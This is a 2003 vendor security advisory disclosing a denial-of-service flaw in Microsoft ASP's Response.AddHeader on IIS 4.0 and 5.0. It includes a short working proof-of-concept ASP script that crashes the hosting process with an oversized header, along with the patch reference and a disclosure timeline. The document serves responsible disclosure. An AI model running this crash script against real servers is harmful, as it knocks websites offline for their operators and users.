AQTRONIX Security Advisory AQ-2003-01 ===================================== Topic: Microsoft Active Server Pages DoS Release date: 18 April 2003 Affected Systems: IIS 4.0, IIS 5.0 with ASP 3.0 installed (I did not test previous versions of ASP). IIS 5.1 and 6.0 are not vulnerable. Mitigating factors: in order to execute the exploit a user would need to be able to upload or change an asp file to the affected server and execute it. Category: Denial of Service Vendor URL: http://www.microsoft.com Author: Parcifal Aertssen This document (and updates) is available at: http://www.aqtronix.com/Advisories/AQ-2003-01.txt CVE: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0225 Introduction ============ Microsofts Active Server Pages contains a flaw in which you could crash the ASP Application and use it as a denial of service. A malicious user would need to be able to upload or change an ASP file and execute it to exploit this bug. Details ======= Microsofts Active Server Pages is a web technology that lets you easily create dynamic web pages and complete web based applications. It is coded in a scripting language like VBScript. To work with the web based parts, ASP adds objects of which you can call functions and set properties. One of those functions in the Response Object contains a flaw that can be used to overflow the stack. The function in particular is Response.AddHeader(). This functions requires a header name and header value as its parameters. If one of those values is a very long string (more than 350000 characters) the ASP application will crash as a result of excessive stack usage. The dllhost.exe process hosting the ASP application will crash, as a result the web site using that application and other ASP applications in the same pool will also crash. The next request for the web site will cause the ASP application to restart (but you lose all application/session state and variables) or if you have application caching enabled the next request will result in the error message "The remote procedure call failed and did not execute." or "The RPC server is unavailable." More request will eventually restart the application. Warning: if you run ASP "in-process" then inetinfo.exe will fail, this means that your complete web server will crash (and restart if you have IIS 5). Exploit ======= <% Dim i, r For i=1 to 3500 'each time append 100 characters r = r + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" Next Response.AddHeader "random-header:", r 'this is where it crashes %> Solution ======== At the initial release of this advisory, there was no solution, and I recommended that you could limit the DoS by running each ASP application as "Isolated". Microsoft told me that this patch was going to be included in the next cumulative patch, which they would release in February. They didn't, they said that they still had a lot of testing to do together with the other issues in the cumulative patch. Since February I haven't heard from them but on 28th May they released a patch which can be found here: http://www.microsoft.com/technet/security/bulletin/MS03-018.asp History ======= 2002.11.04 Found the vulnerability. 2002.11.07 Mailed it to Microsoft. 2003.01.14 Received private patch which worked. 2003.02.10 Received a mail that they still had a lot of testing to do. 2003.04.18 Released initial advisory 2003.05.28 Microsoft released patch, updated solution section and changed affected systems because IIS 5.1 is not vulnerable. Also removed tested systems. Added link to CVE Disclaimer ========== The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind. AQTRONIX is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.